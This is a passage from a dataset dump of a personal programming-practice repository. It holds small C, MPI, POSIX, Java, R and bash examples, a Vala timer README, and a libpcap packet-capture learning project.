cocos2d::Layer\n{\npublic:\n static cocos2d::Scene* createScene();\n\n virtual bool init();\n \n // implement the \"static create()\" method manually\n CREATE_FUNC(HelloWorld);\n\t// void update(float dt) override;\n void updateTime(float dt);\n void actionBegin();\n void actionFinishedCallback();\n// void wButtomClickCallback(cocos2d::Label* pSender);\nprivate:\n\tcocos2d::Sprite* player;\n\tcocos2d::Vector<SpriteFrame*> attack;\n\tcocos2d::Vector<SpriteFrame*> dead;\n\tcocos2d::Vector<SpriteFrame*> 
run;\n\tcocos2d::Vector<SpriteFrame*> idle;\n\tcocos2d::Size visibleSize;\n\tcocos2d::Vec2 origin;\n\tcocos2d::Label* time;\n\tint dtime;\n cocos2d::Rect rect;\n\tcocos2d::ProgressTimer* pT;\n \n bool haveAction;\n\n};\n\n#endif // __HELLOWORLD_SCENE_H__\n" }, { "alpha_fraction": 0.4482758641242981, "alphanum_fraction": 0.4689655303955078, "avg_line_length": 17.1875, "blob_id": "aa3af4f873a85cdf5dab09edcd129ef9d1ed4637", "content_id": "c79e7698138b6bdc2dc6f604b6c40b45a82b2928", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 290, "license_type": "permissive", "max_line_length": 49, "num_lines": 16, "path": "/c/projects/POSIX/Lab1/1.1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int pid_1 = fork();\n if (pid_1 != 0) {\n int pid_2 = fork();\n if (pid_2 != 0) {\n puts(\"a\");\n } else {\n puts(\"c\"); // second sub process print \"c\"\n }\n } else {\n puts(\"b\"); // first sub process print \"b\"\n }\n}" }, { "alpha_fraction": 0.7316129207611084, "alphanum_fraction": 0.7470967769622803, "avg_line_length": 26.714284896850586, "blob_id": "51019bb479ef07568f0932e77c374206f5010115", "content_id": "9fe3d7325ff9e7bdf549139473cd5da7f9a263e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 775, "license_type": "permissive", "max_line_length": 211, "num_lines": 28, "path": "/vala/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Timer-Vala\n`jskyzero` `2017/11/05`\n\n## Overview\n\nA basic timer program implemented in Vala\n\n![](docs/preview.png)\n\nPower By\n+ Vala: Vala is a new programming language that allows modern programming techniques to be used to write applications that run on the GNOME runtime libraries, particularly GLib and GObject.\n+ Gtk+: GTK+ is a multi-platform toolkit for creating graphical user interfaces. 
Offering a complete set of widgets, GTK+ is suitable for projects ranging from small one-off tools to complete application suites.\n\n## Install and Run\n\n```\n# install\nmake \n# run\n./timer\n```\n\n\n## Reference\n\n+ [Vala Tutorial](https://wiki.gnome.org/Projects/Vala/Tutorial)\n+ [Valadoc](https://valadoc.org/index.htm)\n+ [Gtk 3.0](https://lazka.github.io/pgi-docs/Gtk-3.0/index.html)" }, { "alpha_fraction": 0.7053205966949463, "alphanum_fraction": 0.7053205966949463, "avg_line_length": 32.318180084228516, "blob_id": "9b05fc4f65328b2d00f340bfc14beb4ae62c27f4", "content_id": "d87616e6d0631d4c32542b5b63e6c6b43b1aa569", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 733, "license_type": "permissive", "max_line_length": 94, "num_lines": 22, "path": "/c/projects/sniff/Makefile", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "CC= gcc\nCFLAGS= -g -Wall -DDEBUG\nINCLUDES= -I. -I/usr/include/pcap/ #make sure you got the right path of pcap.h on your machine\nLIBS= -lpcap #again, this is usually -lpcap unless you installed it under different name\n#if the linker gives an error (or a whole bunch of them) then you probably\n#don't have libpcap.so to fix the problem make the above line\n#LIBS= /usr/lib/libpcap.a instead\n\nOBJS= buffer.o capture.o\nEXEC= minisniff\n\nall: buffer.o capture.o main.c Makefile\n\t$(CC) $(CFLAGS) $(INCLUDES) main.c $(OBJS) $(LIBS) -o $(EXEC)\n\nbuffer.o: buffer.h buffer.c Makefile\n\t$(CC) $(CFLAGS) $(INCLUDES) -c buffer.c\n\ncapture.o: capture.c capture.h Makefile\n\t$(CC) $(CFLAGS) $(INCLUDES) -c capture.c\n\t\nclean:\n\trm -rf *.o *~ $(EXEC) core\n" }, { "alpha_fraction": 0.7250673770904541, "alphanum_fraction": 0.7277628183364868, "avg_line_length": 23.733333587646484, "blob_id": "8f09d657070c2f21c72d99d99ed67f3cabff0a57", "content_id": "6379eead941d385bacfda1db540247b54d605d9a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": 
false, "language": "Markdown", "length_bytes": 575, "license_type": "permissive", "max_line_length": 92, "num_lines": 15, "path": "/java/hardwork/helloworld/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n## HelloWold\n新建一个文件`HelloWorld.java`,键入如下代码:\n```Java\npublic class HelloWorld \n{\n /* HelloWorld.java */\n public static void main(String []args)\n {\n System.out.println(\"HelloWorld\");\n }\n}\n```\nJava是一门编译型语言,这意味者我们需要先编译,然后才能运行,导航到上述代码的根目录使用命令`javac HelloWorld`编译,然后键入`java HelloWorld`运行。\n\nJDK中有很多其他指令,如`java javac jar native2ascii`等等,具体的学习可以等到用的上的时候在开始查参考。" }, { "alpha_fraction": 0.6162790656089783, "alphanum_fraction": 0.6266149878501892, "avg_line_length": 23.15625, "blob_id": "52f3baf28b320a45a6165b56ecd3acdb74c49515", "content_id": "2d399ff534df6a16c56958947a266ce9e0115843", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 834, "license_type": "permissive", "max_line_length": 69, "num_lines": 32, "path": "/c/projects/MPI/hardway/MPI_group_excluded.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 基于旧进程组创建一个新的组的时候,可能希望排除一些成员进程。\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, even_rank;\n MPI_Group group_world, even_group;\n int i;\n int nonmembers[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs / 2; i++) {\n nonmembers[i] = 2 * i + 1;\n }\n\n // int MPI_Group_excl(MPI_Group old_group, int count, \n // int *nonmembers, MPI_Group *new_group)\n MPI_Group_excl(group_world, numprocs / 2, nonmembers, &even_group);\n\n MPI_Group_rank(even_group, &even_rank);\n\n printf(\"In process %d: even rank is %d\\n\", myid, even_rank);\n\n MPI_Finalize();\n return 0;\n}\n\n" }, { "alpha_fraction": 0.5637982487678528, "alphanum_fraction": 0.5994065403938293, 
"avg_line_length": 19.454545974731445, "blob_id": "5816b870a5acf597a2bcfde92cc151172a3f1190", "content_id": "5351c9682e5325814d37b481d4a46b1f84e931af", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 674, "license_type": "permissive", "max_line_length": 117, "num_lines": 33, "path": "/c/hardwork/tips/const.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\n/*\n * So today, let's talk about const in C\n *\n * You can find more reference on stackoverflow\n * https://stackoverflow.com/questions/1143262/what-is-the-difference-between-const-int-const-int-const-and-int-const\n */\n\nint main() {\n int num0 = 0;\n /* this is same to const int */\n int const num2 = 2;\n const int num1 = 1;\n\n /* this is a const pointer(int *); */\n int* const p1 = &num0;\n /* this is a const int */\n int const* p2 = &num0;\n /*\n * this is a const int\n * const int * == int const *\n * const int * const == int const * const\n *\n */\n const int* p3 = &num0;\n\n *p1 = -1;\n\n fprintf(stdout, \"num0 = %d\\n\", num0);\n\n return 0;\n}" }, { "alpha_fraction": 0.6122503280639648, "alphanum_fraction": 0.6218375563621521, "avg_line_length": 23.232257843017578, "blob_id": "30e75b11789f47633c74d15161d67740dd17316a", "content_id": "491436f5d6399ccfb5b0c81df95a768732b7bb7f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3875, "license_type": "permissive", "max_line_length": 77, "num_lines": 155, "path": "/c/projects/POSIX/Lab3/3.2.reader_first.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n * jskyzero 2017(R)\n */\n\n#include <pthread.h> // for pthread_create(), pthread_exit()\n#include <semaphore.h> // for sem_t, sem_wait(), sem_post()\n#include <stdio.h> // for fopen(), perror()\n#include <stdlib.h> // for exit(), atoi(), malloc(), free()\n#include <string.h> // for strtok()\n#include <unistd.h> // for 
sleep()\n\n// max 3 num, each max 10 char, so we let buffer be 40\n#define LINE_BUFFER_SIZE 40\n// this file is copy from powerpoint\n#define FILE_NAME \"3.2.testfile\"\n// for strtok()\n#define KEY_STR \" \"\n// if you need DEBUG, then uncomment it\n// #define DEBUG_TAG 1\n\n// test data store type\ntypedef struct test_data {\n int index; // 正整数,表示线程序号。\n char type; // 相应线程角色,P表示生产者,C表示消费者。\n int begin_time; // 正数,表示存放或取出操作的开始时间\n int duration; // 正数,表示操作的持续时间。\n} test_data_type;\n\nint readcount;\nsem_t wrt, mutex;\n\nvoid read_file_work();\nvoid line_buffer_to_test_data(char *, test_data_type *);\nvoid print_test_data(test_data_type *);\nvoid work_with_test_data(test_data_type *);\nvoid *reader(void *data);\nvoid *writer(void *data);\nint read_item();\nint write_item();\n\nint main() {\n sem_init(&mutex, 0, 1); \n sem_init(&wrt, 0, 1); \n // Main Part\n read_file_work();\n // creat and then destory\n sem_destroy(&mutex);\n sem_destroy(&wrt);\n // wait wait for all pthreads to complete\n pthread_exit(0);\n}\n\nint read_item() {\n printf(\"-READING-\");\n return 0;\n}\n\nint write_item() {\n printf(\"-WRITING-\");\n return 0;\n}\n\nvoid *reader(void *arg) {\n test_data_type *data = (test_data_type *)arg;\n sleep(data->begin_time);\n sem_wait(&mutex);\n readcount++;\n if (readcount == 1) sem_wait(&wrt);\n sem_post(&mutex);\n\n printf(\" readID:%10d \", data->index);\n if (read_item()) {\n perror(\" READ ERROR\\n\");\n } else {\n printf(\" READ SUCCESS\\n\");\n }\n sleep(data->duration);\n\n sem_wait(&mutex);\n readcount--;\n if (readcount == 0) sem_post(&wrt);\n sem_post(&mutex);\n free(data);\n return (NULL);\n}\n\nvoid *writer(void *arg) {\n test_data_type *data = (test_data_type *)arg;\n sleep(data->begin_time);\n sem_wait(&wrt);\n printf(\"writeID:%10d \", data->index);\n if (write_item()) {\n perror(\"WRITE ERROR\\n\");\n } else {\n printf(\"WRITE SUCCESS\\n\");\n }\n sleep(data->duration);\n sem_post(&wrt);\n free(data);\n return (NULL);\n}\n\nvoid 
work_with_test_data(test_data_type *data) {\n pthread_t thread;\n if (data->type == 'R') {\n pthread_create(&thread, NULL, reader, (void *)data);\n } else {\n pthread_create(&thread, NULL, writer, (void *)data);\n }\n}\n\nvoid print_test_data(test_data_type *data) {\n printf(\"|index:%10d|type:%c|begin_time:%10d|duration:%10d|\\n\", data->index,\n data->type, data->begin_time, data->duration);\n}\n\nvoid line_buffer_to_test_data(char *line, test_data_type *data) {\n char *pch = strtok(line, KEY_STR);\n data->index = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n data->type = pch[0];\n pch = strtok(NULL, KEY_STR);\n data->begin_time = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n data->duration = atoi(pch);\n}\n\nvoid read_file_work() {\n // malloc buffer\n char *line_buffer = (char *)malloc(sizeof(char) * LINE_BUFFER_SIZE);\n if (line_buffer == NULL) {\n perror(\"malloc faile\\n\");\n exit(-1);\n }\n // open file\n FILE *test_file = fopen(FILE_NAME, \"r\");\n if (test_file == NULL) {\n perror(\"File open failed\\n\");\n exit(-1);\n }\n // readfile and process\n while (fgets(line_buffer, LINE_BUFFER_SIZE, test_file) != NULL) {\n test_data_type *line_test_data =\n (test_data_type *)malloc(sizeof(test_data_type));\n line_buffer_to_test_data(line_buffer, line_test_data);\n#ifdef DEBUG_TAG\n print_test_data(line_test_data);\n#endif\n work_with_test_data(line_test_data);\n }\n // free malloc data\n free(line_buffer);\n // close file\n fclose(test_file);\n}" }, { "alpha_fraction": 0.6663973927497864, "alphanum_fraction": 0.6680129170417786, "avg_line_length": 27.813953399658203, "blob_id": "839b66c32d6ff421091fd93844f87f5037381661", "content_id": "4f78df40e26c3b2cb41974be0c95456352c4c369", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1698, "license_type": "permissive", "max_line_length": 60, "num_lines": 43, "path": "/c/projects/MPI/hardway/MPI_comm_dup.c", "repo_name": "jskyzero/Languages", "src_encoding": 
"UTF-8", "text": "// 在之前的学习中,我们经常使用系统帮助我们创建的初始组内通信子MPI_COMM_WORLD作为通信子的输入。\n// 其实,还有两个系统默认创建的通信子,一个是COMM_SELF,另一个是COMM_NULL。\n// COMM_SELF仅仅包含了当前进程,而COMM_NULL则什么进程都没有包含。\n// 在通信子的创建中,需要特别注意的是MPI中有一个\"鸡生蛋, 蛋生鸡\"的特点,\n// 即所有MPI通信子的创建都是由基础通信子,即MPI_COMM_WORLD(是在MPI的外部被定义的),创建的。\n// 而这些被创建的通信子又可以作为新的通信子创建的基础。\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Comm new_comm;\n int result;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n // int MPI_Comm_dup(MPI_Comm comm,MPI_Comm *newcomm)\n MPI_Comm_dup(MPI_COMM_WORLD, &new_comm);\n\n MPI_Comm_compare(MPI_COMM_WORLD, new_comm, &result);\n\n // MPI_IDENT表示上下文(context)和组(group)都相同,\n // MPI_CONGRUENT表示上下文不同(different)但组完全相同(identical),\n // MPI_SIMILAR表示上下文不同,组的成员相同但次序不同(similar),\n // 否则就是MPI_UNEQUAL。\n if (myid == 0) {\n if (result == MPI_IDENT) {\n printf(\"The comms are identical.\\n\");\n } else if (result == MPI_CONGRUENT) {\n printf(\"The comms are congruent.\\n\");\n } else if (result == MPI_SIMILAR) {\n printf(\"The comms are similar.\\n\");\n } else if (result == MPI_UNEQUAL) {\n printf(\"The comms are unequal.\\n\");\n }\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.43724697828292847, "alphanum_fraction": 0.4655870497226715, "avg_line_length": 19.625, "blob_id": "a157b4265c2cc39943fa286c92ec6df0fdfc6767", "content_id": "d4fc450274b2f8195b6310745a6f37432c5cb287", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 494, "license_type": "permissive", "max_line_length": 68, "num_lines": 24, "path": "/java/projects/algorithms/chapter1/part1/Q11.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q11\n */\n\npublic class Q11 {\n public static void main(String[] args) {\n Boolean array[][] = {{true, true, false}, {false, false, true}};\n\n System.out.printf(\"%8s\", \"R\\\\L\");\n for (int j 
= 0; j < 3; j++) {\n System.out.printf(\"%8d\", j);\n }\n System.out.printf(\"\\n\");\n\n for (int i = 0; i < 2; i++) {\n System.out.printf(\"%8d\", i);\n for (int j = 0; j < 3; j++) {\n System.out.printf(\"%8b\", array[i][j]);\n }\n System.out.printf(\"\\n\");\n }\n\n }\n}" }, { "alpha_fraction": 0.6549707651138306, "alphanum_fraction": 0.6608186960220337, "avg_line_length": 20.5, "blob_id": "30ab441bed1ac571bd5cdad9559410f76170f601", "content_id": "bf0ab21eb1d23b594e7f225b66e94f73feb5b490", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 171, "license_type": "permissive", "max_line_length": 63, "num_lines": 8, "path": "/c/hardwork/helloworld/helloworld.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf\n\n// this is main func\nint main() {\n // call the 'printf' function to print 'HelloWorld' in screen\n printf(\"HelloWorld\\n\");\n return 0;\n}" }, { "alpha_fraction": 0.40779221057891846, "alphanum_fraction": 0.4545454680919647, "avg_line_length": 20.38888931274414, "blob_id": "6dab57d2f533d18d2d262885cb7e09c73961531a", "content_id": "50f33fe69fe2008ade27f32b4e3d740e8c59162f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 385, "license_type": "permissive", "max_line_length": 64, "num_lines": 18, "path": "/c/hardwork/hardway/double_size.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n\nint *doubleCapacity(int *p, int n) {\n static int a[10000];\n for (int i = 0; i < n; i++) {\n *(a + i) = *(p + i);\n }\n for (int i = 0; i < n; i++) {\n *(a + n + i) = 0;\n }\n return a;\n}\n\nint main() {\n int list[5] = {1, 2, 3, 4, 5};\n int *newlist = doubleCapacity(list, 5);\n for (int i = 0; i < 2 * 5; i++) printf(\"%d \", *(newlist + i));\n}\n" }, { "alpha_fraction": 0.5802469253540039, "alphanum_fraction": 0.6234567761421204, 
"avg_line_length": 19.3125, "blob_id": "ab7757c5e3b9c0730d9a6fa2571cd2be0feeacff", "content_id": "63044ff5262f1b7f0af3dfc55cc143aea4546fef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 324, "license_type": "permissive", "max_line_length": 58, "num_lines": 16, "path": "/R/harwork/packages/wordcloud2/wordcloud.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# wordcloud2\n# from https://github.com/Lchiffon/wordcloud2\n\nlibrary(wordcloud2)\n\n# so column name is not valueable ?\nwords_frame <- data.frame(\n v2 = c(1:5),\n v3 = c(5:1)\n)\n\n# print(class(demoFreqC))\n\nwordcloud2(words_frame, size = 2, \n minRotation = - pi / 6, maxRotation = - pi / 6,\n rotateRatio = 1)" }, { "alpha_fraction": 0.6140350699424744, "alphanum_fraction": 0.6456140279769897, "avg_line_length": 25, "blob_id": "0657935160ea804ab85f5ed0198c2f4601e8412c", "content_id": "3d112099bd113d33cefdaf327b05de02e61e2808", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 285, "license_type": "permissive", "max_line_length": 65, "num_lines": 11, "path": "/R/harwork/packages/fun/mime_sweeper.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# install.packages(\"fun\")\n# from https://www.rdocumentation.org/packages/fun/versions/0.1-0\nlibrary(\"fun\")\n\n## should use Xlib for the x11() device under *nix, e.g\n## Not run: \n# if (.Platform$OS.type == \"windows\") \n# x11() else x11(type = \"Xlib\")\n# ## End(Not run)\n\nmine_sweeper()" }, { "alpha_fraction": 0.3888888955116272, "alphanum_fraction": 0.46296295523643494, "avg_line_length": 54, "blob_id": "d622843ac4e39b56467803b7719e2f25a5f8e3f9", "content_id": "ccf2252aff3b197b559dc394f3c9d9e1dd301ae2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 54, "license_type": "permissive", "max_line_length": 54, "num_lines": 1, 
"path": "/bash/example/rename_file.sh", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "ls | cut -d '.' -f 1 | xargs -I {1} mv {1}.png {1}.jpg" }, { "alpha_fraction": 0.571212112903595, "alphanum_fraction": 0.5878787636756897, "avg_line_length": 18.441177368164062, "blob_id": "f0df693bdbc7fb43f0c974b501bf05b1f4739f81", "content_id": "eb147b3af584c39b978c4c9455cd4175983c93c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 660, "license_type": "permissive", "max_line_length": 41, "num_lines": 34, "path": "/c/hardwork/hardway/to_binary.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <stdlib.h> // for rand()\n#include <time.h> // for time()\n\n#define TEST_SIZE 10\n\ntypedef int num_type;\n\nvoid dec_to_bin(num_type n);\nvoid print_binary(num_type n);\n\nint main() {\n // void srand (unsigned int seed)\n srand(time(NULL));\n\n for (int i = 0; i < TEST_SIZE; i++) {\n // int rand (void)\n // num_type == rand return value type\n dec_to_bin(rand());\n }\n}\n\n// print the dec and bin value of the num\nvoid dec_to_bin(num_type n ) {\n printf(\"%22d(10) is \", n); \n print_binary(n);\n printf(\"(2)\\n\");\n}\n\nvoid print_binary(num_type n) {\n if (n <= 0) return;\n print_binary(n / 2);\n printf(\"%d\", n % 2);\n}" }, { "alpha_fraction": 0.5861027240753174, "alphanum_fraction": 0.5957704186439514, "avg_line_length": 24.859375, "blob_id": "4a72150f73fa8f10912e124c2062b9a4fc5d91ae", "content_id": "4ba4358a7f47ca14212d3eb3387eb9fb989f3595", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1655, "license_type": "permissive", "max_line_length": 83, "num_lines": 64, "path": "/c/projects/POSIX/Lab1/3.1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <unistd.h> // for fork()\n#include <sys/shm.h> // for 
shmget() shmat()\n#include <sys/stat.h> // for S_IRUSR, S_IWUSR\n#include <stdlib.h> // for exit()\n#include <assert.h> // for assert()\n\n#define MAX_SEQUENCE 10\n\n// share memory structure\ntypedef struct {\n long fib_sequence[MAX_SEQUENCE];\n int sequence_size;\n} share_data;\n\nint main(int argv, char *args[])\n{\n // run with only one num \n assert(argv == 2);\n // get size \n int size = atoi(args[1]);\n // check size\n if (size >= MAX_SEQUENCE) {\n puts(\"args size too big\\n\");\n exit(1);\n }\n // begin to store info about shm\n int pid;\n int segment_id;\n share_data *share;\n // ask shm and connecte\n segment_id = shmget(IPC_PRIVATE, sizeof(share_data), S_IRUSR | S_IWUSR);\n share = (share_data *) shmat(segment_id, NULL, 0);\n // initial size\n share->sequence_size = size;\n // fork()\n if ((pid = fork())) {\n // wait sub process finished\n wait(NULL);\n // father process print and \n for (int i = 0 ; i < share->sequence_size; i++) {\n printf(\"%ld \", share->fib_sequence[i]);\n }\n puts(\"\\n\");\n // close connection\n shmdt(share);\n // free shm\n shmctl(segment_id, IPC_RMID, NULL);\n } else {\n // sub process\n // intial fib[0] and fib[1]\n share->fib_sequence[0] = 0;\n share->fib_sequence[1] = 1;\n // calculate later fib[i] \n for (int i = 2 ; i < share->sequence_size; i++) {\n share->fib_sequence[i] = share->fib_sequence[i-1] + share->fib_sequence[i-2];\n }\n // close connection\n shmdt(share);\n\n // why no connection ? 
\n // sub process have a connection from father process\n }\n}\n" }, { "alpha_fraction": 0.6564659476280212, "alphanum_fraction": 0.6604146361351013, "avg_line_length": 24.350000381469727, "blob_id": "ecb602612b4c3cb309c7fc74bf114e4a9199b1c0", "content_id": "46cba297daa93802d7f44efed56fe16d50067813", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1143, "license_type": "permissive", "max_line_length": 79, "num_lines": 40, "path": "/c/projects/MPI/hardway/MPI_comm_split.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 有时候我们希望根据拓扑来创建不同的域,例如创建一个二维数组,显然一个个创建是很不方便的,\n// 这时候我们需要用到一个新的函数来进行划分。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Comm row_comm, column_comm;\n int myrow, mycolumn;\n int color = 3;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n myrow = myid / color;\n mycolumn = myid % color;\n\n // int MPI_Comm_split(MPI_Comm comm, int color, int key, MPI_Comm *newcomm)\n MPI_Comm_split(MPI_COMM_WORLD, mycolumn, myrow, &row_comm);\n MPI_Comm_split(MPI_COMM_WORLD, myrow, mycolumn, &column_comm);\n\n int rowsum, columnsum;\n\n rowsum = myid;\n columnsum = myid;\n\n MPI_Allreduce(MPI_IN_PLACE, &rowsum, 1, MPI_INT, MPI_SUM, row_comm);\n MPI_Allreduce(MPI_IN_PLACE, &columnsum, 1, MPI_INT, MPI_SUM, column_comm);\n\n printf(\n \"I'm process %d, my coordinates are (%d, %d), row sum is %d, column sum \"\n \"is %d\\n\",\n myid, myrow, mycolumn, rowsum, columnsum);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.7560137510299683, "alphanum_fraction": 0.7651775479316711, "avg_line_length": 57.266666412353516, "blob_id": "814d9160f6c705f90702a11aec6f83f2d3c115f9", "content_id": "f1b827a95c9550144d982cab264748b01d1cb57e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 873, 
"license_type": "permissive", "max_line_length": 552, "num_lines": 15, "path": "/java/hardwork/ant/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Apache Ant\n`jskyzero` `2017/12/31`\n\n## Overview\nApache Ant is a Java library and command-line tool whose mission is to drive processes described in build files as targets and extension points dependent upon each other. The main known usage of Ant is the build of Java applications. Ant supplies a number of built-in tasks allowing to compile, assemble, test and run Java applications. Ant can also be used effectively to build non Java applications, for instance C or C++ applications. More generally, Ant can be used to pilot any type of process which can be described in terms of targets and tasks.\n\n## Install && Run\n\n+ install : `sudo apt-get install ant`\n+ run : `ant run`(if you have written build.xml)\n\n## Reference\n\n+ [ant.apache.org](http://ant.apache.org/)\n+ [Tutorial: Hello World with Apache Ant](https://ant.apache.org/manual/tutorial-HelloWorldWithAnt.html)" }, { "alpha_fraction": 0.5471698045730591, "alphanum_fraction": 0.5660377144813538, "avg_line_length": 12.25, "blob_id": "91c513f9aea35c7c6457ddd219d456dd91393c57", "content_id": "dbd56e7d00254dbd2e6facb8c10dc3cec08d59f8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 106, "license_type": "permissive", "max_line_length": 22, "num_lines": 8, "path": "/c/hardwork/hardway/ifdef.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#define Cprog\nint main() {\n int a = 2;\n#ifdef Cprog\n a = 1;\n printf(\"%d\", Cprog);\n}\n" }, { "alpha_fraction": 0.47346073389053345, "alphanum_fraction": 0.48619958758354187, "avg_line_length": 15.821428298950195, "blob_id": "a6aec7caa875e8826b83e10de69d519ccbe04175", "content_id": "3d2f141449bff2e460aa595187477e677d1cf7ca", "detected_licenses": [ "MIT" ], "is_generated": false, 
"is_vendor": false, "language": "C", "length_bytes": 489, "license_type": "permissive", "max_line_length": 43, "num_lines": 28, "path": "/c/hardwork/library/string/reverse_string.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf(), puts() \n#include <string.h> // for strlen()\n\n// 操作字符串函数实践\nchar* reverseString(char* s) {\n int n = strlen(s); // string length\n int i = 0; // for loop\n\n char p[n]; // store reversed string\n\n for (i = n - 1; i >= 0; i--) {\n p[n - 1 - i] = s[i];\n }\n puts(p);\n \n for (i = n - 1; i >= 0; i--) {\n s[i] = p[i];\n }\n\n puts(s);\n return s;\n}\n\nint main() {\n char s[] = \"hello\";\n char* p = reverseString(s);\n printf(\"%s\", p);\n}\n" }, { "alpha_fraction": 0.7130584120750427, "alphanum_fraction": 0.7156357169151306, "avg_line_length": 49.60869598388672, "blob_id": "9c484e846ce3e060a20b7304c22841a206ec1f62", "content_id": "a1c6f6bf0ca63f3da74aed9ca0ff609225288ce5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1164, "license_type": "permissive", "max_line_length": 80, "num_lines": 23, "path": "/c/projects/sniff/capture.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <capture.h>\n\n/* this is the callback function used by pcap. which means, whenever pcap\n * receives a packet it calls this function. let me explain the parameters of\n * pcap_callback now 0) first one is a parameter we just wanted to pass to our\n * function (basically any variable(s) we want to use in here from main()) 1)\n * second one is the header of the packet we captured, this includes ethernet\n * header, followed by ip header etc. 2) third one is the full packet, i.e. raw\n * packet right out of the wire with its payload\n *\n * so, what i'm doing here is simply adding the packet and packet header to a\n * linked-list, but you can do anything you want this packet. 
see what i'm doing\n * with the packets i store in the linked-list in the main, you can almost\n * copy-paste that stuff here and it would work just fine.\n */\nvoid pcap_callback(u_char *arg, const struct pcap_pkthdr *pkthdr,\n const u_char *packet) {\n /* just append the packet header and raw packet to the linked-list\n * nothing fancy here, look at main() to learn how to work with the\n * packet header etc.\n */\n append_item((buffer *)arg, pkthdr, packet);\n}\n" }, { "alpha_fraction": 0.5608108043670654, "alphanum_fraction": 0.5698198080062866, "avg_line_length": 14.518518447875977, "blob_id": "3becbe4cd254a3a744312f0e337337ec9e5139f7", "content_id": "216854e4125164998d4bf838a954c249e36f6faf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 488, "license_type": "permissive", "max_line_length": 72, "num_lines": 27, "path": "/c/hardwork/library/time/clock.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <time.h>\r\n\r\n/*\r\n 既然决定了还是好好看下去吧w\r\n 半途而废又算什么呢?\r\n*/\r\ntypedef void(*void_func)(void);\r\n\r\nvoid check_time(void_func func){\r\n clock_t begin_time = clock();\r\n func();\r\n clock_t end_time = clock();\r\n printf(\"use time %f\", (float)(end_time - begin_time)/CLOCKS_PER_SEC); \r\n}\r\n\r\nvoid 